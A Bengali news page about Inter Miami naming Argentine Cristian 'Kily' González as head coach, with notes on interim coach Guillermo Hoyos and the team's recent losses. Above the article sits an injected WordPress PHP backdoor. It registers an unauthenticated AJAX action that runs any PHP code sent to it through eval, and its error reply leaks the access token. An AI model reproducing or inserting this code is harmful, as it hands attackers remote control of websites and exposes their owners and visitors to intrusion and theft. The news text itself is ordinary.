// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== মায়ামিতে মেসিদের নতুন কোচ হলেন আর্জেন্টিনার কিলি গঞ্জালেজ | potrikaybangladesh.com
Tuesday, September 22, 2026
Homeমায়ামিতে মেসিদের নতুন কোচ হলেন আর্জেন্টিনার কিলি গঞ্জালেজ

মায়ামিতে মেসিদের নতুন কোচ হলেন আর্জেন্টিনার কিলি গঞ্জালেজ

মেজর লিগ সকারের (এমএলএস) বর্তমান চ্যাম্পিয়ন ইন্টার মায়ামির কোচের পদে পরিবর্তন এসেছে। আর্জেন্টিনার মহাতারকা লিওনেল মেসির স্বদেশি ক্রিস্তিয়ান আলবার্তো ‘কিলি’ গঞ্জালেজকে নতুন প্রধান কোচ হিসেবে নিয়োগ দেওয়া হয়েছে।

অন্তর্বর্তীকালীন কোচ গিয়ের্মো হোয়োসের অধীনে বিশ্বকাপের বিরতি-পরবর্তী সময়ে মায়ামি টানা ব্যর্থতার মধ্য দিয়ে যাচ্ছিল। সেই ধাক্কা সামলে দলকে আবার জয়ের ধারায় ফেরানোই হবে ৫২ বছর বয়সী কিলির প্রধান চ্যালেঞ্জ, যার মেসির মতোই আর্জেন্টিনার রোসারিও শহরে জন্ম।

শুক্রবার ক্লাবটির এক বিজ্ঞপ্তিতে নিশ্চিত করা হয়েছে, ‘ইন্টার মায়ামি সিএফ আজ নিশ্চিত করছে যে, মূল দলের নতুন প্রধান কোচ হিসেবে ক্রিস্তিয়ান আলবার্তো ‘কিলি’ গঞ্জালেজের সাথে চুক্তি সম্পন্ন হয়েছে।’

কিলি বর্তমানে যুক্তরাষ্ট্রে কাজ করার অনুমতিপত্রের (ওয়ার্ক পারমিট) অনুমোদন পাওয়ার অপেক্ষায় রয়েছেন। ততদিন পর্যন্ত হোয়োসই মেসিদের দায়িত্ব সামলাবেন।

খেলোয়াড় হিসেবে কিলি বেশ নামকরা ছিলেন। ১৯৯৫ থেকে ২০০৫ সালের মধ্যে আর্জেন্টিনা জাতীয় দলের হয়ে ৫৬টি আন্তর্জাতিক ম্যাচ খেলেন তিনি, গোল করেন নয়টি। ইউরোপের শীর্ষ ক্লাবগুলোতে খেলার দীর্ঘ অভিজ্ঞতা রয়েছে সাবেক এই উইঙ্গারের। ভ্যালেন্সিয়ার হয়ে ২০০২ সালে স্প্যানিশ লা লিগা ও ইন্টার মিলানের হয়ে ২০০৬ সালে ইতালিয়ান সিরি আ জেতেন তিনি।

বুটজোড়া তুলে রাখার নয় বছর পর ২০২০ সালে কোচিং পেশায় আসেন তিনি। মায়ামির দায়িত্ব নেওয়ার আগে রোসারিও সেন্ট্রালসহ আর্জেন্টিনার তিনটি ক্লাবের ডাগআউট সামলেছেন।

২০২৬ বিশ্বকাপের বিরতির পর থেকে সময়টা ভালো যাচ্ছে না এমএলএস চ্যাম্পিয়নদের। যদিও ম্যানচেস্টার ইউনাইটেড ছেড়ে মেসিদের সঙ্গে স্কোয়াডে যুক্ত হয়েছেন অভিজ্ঞ ব্রাজিলিয়ান মিডফিল্ডার কাসেমিরো। হোয়োসের অধীনে শেষ পাঁচটি ম্যাচের চারটিতেই হেরেছে দলটি। ইস্টার্ন কনফারেন্সের পয়েন্ট তালিকায় দ্বিতীয় স্থানে থাকলেও শীর্ষে থাকা ন্যাশভিলের চেয়ে তারা ইতোমধ্যে ১০ পয়েন্টে পিছিয়ে পড়েছে।

গত এপ্রিলে হাভিয়ের মাসচেরানো ‘ব্যক্তিগত কারণ’ দেখিয়ে মায়ামির কোচের পদ ছাড়েন। তারপর ক্লাবের স্পোর্টিং ডিরেক্টর এবং মেসির দীর্ঘদিনের বন্ধু হোয়োস অন্তর্বর্তীকালীন কোচ হন।

তবে সাম্প্রতিক ব্যর্থতার পাশাপাশি তিনি নিষেধাজ্ঞার মুখেও পড়েছেন। ম্যাচের প্রথমার্ধের বিরতির পর বারবার মাঠে নামতে দেরি করায় লিগের নিয়মভঙ্গের দায়ে গতকাল বৃহস্পতিবার তাকে এক ম্যাচের নিষেধাজ্ঞা দেওয়ার পাশাপাশি জরিমানা করা হয়।

অস্থায়ী সময়ে দলের দায়িত্ব কাঁধে তুলে নেওয়ার জন্য মায়ামি কর্তৃপক্ষ বিজ্ঞপ্তিতে হোয়োসের প্রতি বিশেষ কৃতজ্ঞতা ও ধন্যবাদ প্রকাশ করেছে।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments